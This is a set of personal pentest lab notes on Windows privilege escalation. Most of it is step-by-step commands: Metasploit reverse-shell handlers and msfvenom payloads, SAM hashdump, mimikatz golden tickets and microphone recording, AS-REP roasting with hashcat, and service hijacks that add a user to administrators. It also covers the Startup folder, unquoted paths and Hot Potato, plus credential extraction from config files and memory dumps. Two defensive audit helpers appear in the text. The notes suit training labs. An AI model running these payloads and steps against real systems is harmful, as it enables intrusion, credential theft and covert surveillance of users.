Windows Privilege Escalation Notes

post/multi/manage/shell_to_meterpreter

sessions -i (select the session)


run post/windows/gather/hashdump -- dumps the users' IDs and password hashes (from the SAM database)


dir C:\  --> list a directory
more flag1.txt --> read a file's contents
type flag2.txt

Search all of C: for the flags --> flag* /s /p (dir switches: /s recurses into subdirectories, /p pauses per screen)

http://blog.yigith.com/20-temel-windows-ms-dos-komutu/


The icacls command shows which user groups can access a given folder / file.


------------

meterpreter > run post/multi/recon/local_exploit_suggester (suggests exploits; check the Windows system info and architecture first)

privilege -> https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672#:~:text=store%20configuration%20information.-,SeTakeOwnershipPrivilege,the%20owner%20of%20an%20object.

migrate -N PROCESS_NAME

After migrating into a process that runs as SYSTEM, type load kiwi (the current version of mimikatz).

The commands below can be seen with the help command (kiwi help).

screenshare -- Which command lets us watch the remote user's desktop in real time (more useful when interacting with a machine that is actively in use)?

record_mic -- What if we want to record from a microphone connected to the system?

timestomp -- modify a file's timestamps (relevant to forensics)


golden_ticket_create
Mimikatz lets us create what is called a "golden ticket", which lets us authenticate easily anywhere. Which command lets us do this?



If you have obtained a user's credentials (for RDP) and RDP is not enabled:
run post/windows/manage/enable_rdp

The machine may not respond to ping: nmap 10.10.171.13 -Pn -v

Also add the 301s to -x

RDP connection: xfreerdp /u:user /p:password321 /v:10.10.112.110
rdesktop -u user -p password321 10.10.19.115


To have the directory you moved into show everything, append /*.* to the end of the path


exploit/multi/script/web_delivery  --> opens a port on the Kali system and generates code to run on Windows; when that code is executed on the target, you receive a connection back

To turn this connection into a meterpreter session --> set payload windows/meterpreter/reverse_http

PSH -> PowerSHell

run -> recent

If a file won't open because of missing permissions: Properties, Security, file permissions; under Object Name enter the user name you are logged in with (etc.) and press Check Names

-----

AS-REP ROASTING


./kerbrute-kali-64 userenum --dc 10.10.71.93 -d spookysec.local userlist.txt -t 100



GetNPUsers.py -no-pass -dc-ip 10.10.71.93 spookysec.local/svc-admin   
(the hash type is printed at the start of the line)

With the hash you found -> hashcat --help (look up the mode number for that hash type)

hashcat -m 18200 -a 0 hash.txt passwordlist.txt --force

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e4876a80a723612986d7609aa5ebc12b:::
(hashdump format: user:RID:LM hash:NT hash:::; the fourth field, e4876a80a723612986d7609aa5ebc12b, is the NT hash to crack, and aad3b435b51404eeaad3b435b51404ee is the well-known empty LM hash)


Evil-WinRM  -- https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/



****
Shell via AutoRun (? Win7)

AutoRun files: C:\Program Files\Autorun Program

win cmd : C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
A panel opens, and the Logon tab lists a program that runs at AutoRun;
we replace that program with the payload we generated with msfvenom

**************


Registry Escalation - AlwaysInstallElevated



1. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
2. From the output, notice that the “AlwaysInstallElevated” value is 1.
3. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
4. From the output, notice that the “AlwaysInstallElevated” value is 1.
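The point of checking both hives is that Windows Installer only runs packages as SYSTEM when the policy is enabled under HKLM and HKCU at the same time. The following audit helper is an added example, not part of the original notes: it parses constructed `reg query` output for both hives and reports the policy as effective only when both report 0x1 (an absent key counts as 0).

```python
"""Audit helper: decide from `reg query` output whether AlwaysInstallElevated is
effectively on. Added example, not from the original notes; the outputs below
are constructed, and the misconfiguration applies only when BOTH hives are 0x1."""
import re

# Constructed samples of `reg query HKLM\...\Installer` and the HKCU equivalent.
HKLM_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
# `reg query` prints this (and exits non-zero) when the key or value is absent.
MISSING_OUTPUT = "ERROR: The system was unable to find the specified registry key or value."


def parse_always_install_elevated(reg_output):
    """Return the DWORD value of AlwaysInstallElevated from one hive's output,
    or 0 when the key/value is absent (absent means the policy is not set)."""
    m = re.search(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)", reg_output)
    return int(m.group(1), 16) if m else 0


def always_install_elevated_enabled(hklm_output, hkcu_output):
    """Windows Installer elevates MSI installs only when the policy is 1 in
    both the machine hive (HKLM) and the current user's hive (HKCU)."""
    return (parse_always_install_elevated(hklm_output) == 1
            and parse_always_install_elevated(hkcu_output) == 1)


if __name__ == "__main__":
    print("both hives set   :", always_install_elevated_enabled(HKLM_OUTPUT, HKCU_OUTPUT))
    print("HKCU value absent:", always_install_elevated_enabled(HKLM_OUTPUT, MISSING_OUTPUT))
```

Remediation is to set the value to 0 (or remove it) in both hives, which is what disabling the "Always install with elevated privileges" policy under both Computer Configuration and User Configuration does.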


https://ozdenercin.com/2019/06/28/derinlemesine-windows-privilege-escalation-yetki-yukseltmesi/#:~:text=AlwaysInstallElevated%2C%20ayr%C4%B1cal%C4%B1kl%C4%B1%20olmayan%20kullan%C4%B1c%C4%B1lar%C4%B1n%20Microsoft,ayarlanm%C4%B1%C5%9F%20olup%20olmad%C4%B1%C4%9F%C4%B1n%C4%B1%20kontrol%20etmelisiniz.

python3 -m http.server


*******************

Service Escalation - Registry



1. Open a PowerShell prompt and type:  Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
2. Notice that the output shows "NT AUTHORITY\INTERACTIVE", which the user belongs to, has "FullControl" permission on the registry key.


There is a Windows service written in C;
edit the system() call in its code to -> cmd.exe /k net localgroup administrators user /add

To compile: x86_64-w64-mingw32-gcc windows_service.c -o x.exe
Must be installed first: sudo apt install gcc-mingw-w64

cmd command on Windows to point the service at the file:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

cmd:
sc start regsvc

The user is now added to net localgroup administrators.


*************************


Service Escalation - Executable Files


1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
2. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.


1. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
2. In command prompt type: sc start filepermsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators


*****************************


Privilege Escalation - Startup Applications



1. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
2. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.


1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
7. Copy the generated file, x.exe, to the Windows VM.



1. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
2. Restart the victim PC.
3. A Meterpreter session opens.


************************

Service Escalation - DLL Hijacking








*****************************
Service Escalation - binPath


Detection

Windows VM

1. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc

2. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.

Exploitation

Windows VM

1. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
2. In command prompt type: sc start daclsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators


**************************


Service Escalation - Unquoted Service Paths 


Detection

Windows VM

1. Open command prompt and type: sc qc unquotedsvc
2. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.
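What makes an unquoted BINARY_PATH_NAME exploitable is the way CreateProcess resolves it: it tries the text up to each space as an executable name before reaching the real one, so a writable directory anywhere along that chain is the risk. The audit helper below is an added example, not from the original notes; it extracts the path from constructed `sc qc` output and lists the candidate executables in the order Windows would try them, which is the list of paths whose directories should be checked with icacls.

```python
"""Audit helper: flag an unquoted service path with spaces and list the
executables CreateProcess would try before the real one. Added example, not
from the original notes; the `sc qc` output below is constructed."""
import re

# Constructed sample of `sc qc unquotedsvc` output (not a real capture).
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        DISPLAY_NAME       : Unquoted Path Service
        SERVICE_START_NAME : LocalSystem
"""


def binary_path_from_sc_qc(text):
    """Return the BINARY_PATH_NAME value from `sc qc` output (None if absent)."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", text)
    return m.group(1).strip() if m else None


def search_candidates(binpath):
    """Paths CreateProcess tries, in order, for the command line: the text up
    to each space, with .exe appended when that token has no .exe extension.
    A quoted path yields exactly one candidate; arguments after the .exe are
    ignored because the real executable is found before they are reached."""
    p = binpath.strip()
    if p.startswith('"'):
        return [p.split('"')[1]]
    parts = p.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        token = " ".join(parts[:i])
        candidates.append(token if token.lower().endswith(".exe") else token + ".exe")
        if token.lower().endswith(".exe"):
            break  # reached the real executable; remaining tokens are arguments
    return candidates


def is_unquoted_with_spaces(binpath):
    """True when more than one candidate exists, i.e. the path is ambiguous."""
    return len(search_candidates(binpath)) > 1


if __name__ == "__main__":
    path = binary_path_from_sc_qc(SC_QC_OUTPUT)
    print("ambiguous:", is_unquoted_with_spaces(path))
    for cand in search_candidates(path):
        print("  would try:", cand)  # check write access to each directory with icacls
```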

Exploitation

Kali VM

1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators


******************************



Potato Escalation - Hot Potato  



Windows VM

1. In command prompt type: powershell.exe -nop -ep bypass
2. In the PowerShell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
3. In the PowerShell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
4. To confirm that the attack was successful, in the PowerShell prompt type: net localgroup administrators


*******************************


Password Mining Escalation - Configuration Files  ( C:\Windows\Panther\Unattend.xml )


Exploitation

Windows VM

1. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
2. Scroll down to the “<Password>” property and copy the base64 string that is confined between the “<Value>” tags underneath it.

Kali VM

1. In a terminal, type: echo [copied base64] | base64 -d
2. Notice the cleartext password



************************************


Password Mining Escalation - Memory


Exploitation

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
3. In Metasploit (msf > prompt) type: set uripath x
4. In Metasploit (msf > prompt) type: run

Windows VM

1. Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
2. Open command prompt and type: taskmgr
3. In Windows Task Manager, right-click on “iexplore.exe” in the “Image Name” column and select “Create Dump File” from the popup menu.
4. Copy the generated file, iexplore.DMP, to the Kali VM.

Kali VM

1. Place ‘iexplore.DMP’ on the desktop.
2. Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
3. Select and copy the Base64-encoded string.
4. In command prompt type: echo -ne [Base64 String] | base64 -d
5. Notice the credentials in the output.


****************************

Privilege Escalation - Kernel Exploits


Establish a shell

Kali VM

1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe
7. Copy the generated file, shell.exe, to the Windows VM.

Windows VM

1. Execute shell.exe and obtain reverse shell

Detection & Exploitation

Kali VM

1. In Metasploit (msf > prompt) type: run post/multi/recon/local_exploit_suggester
2. Identify exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation
3. In Metasploit (msf > prompt) type: use exploit/windows/local/ms16_014_wmi_recv_notif
4. In Metasploit (msf > prompt) type: set SESSION [meterpreter SESSION number]
5. In Metasploit (msf > prompt) type: set LPORT 5555
6. In Metasploit (msf > prompt) type: run

NOTE: The shell might default to your eth0 during this attack.  If so, ensure you type set lhost [Kali VM IP Address] and run again.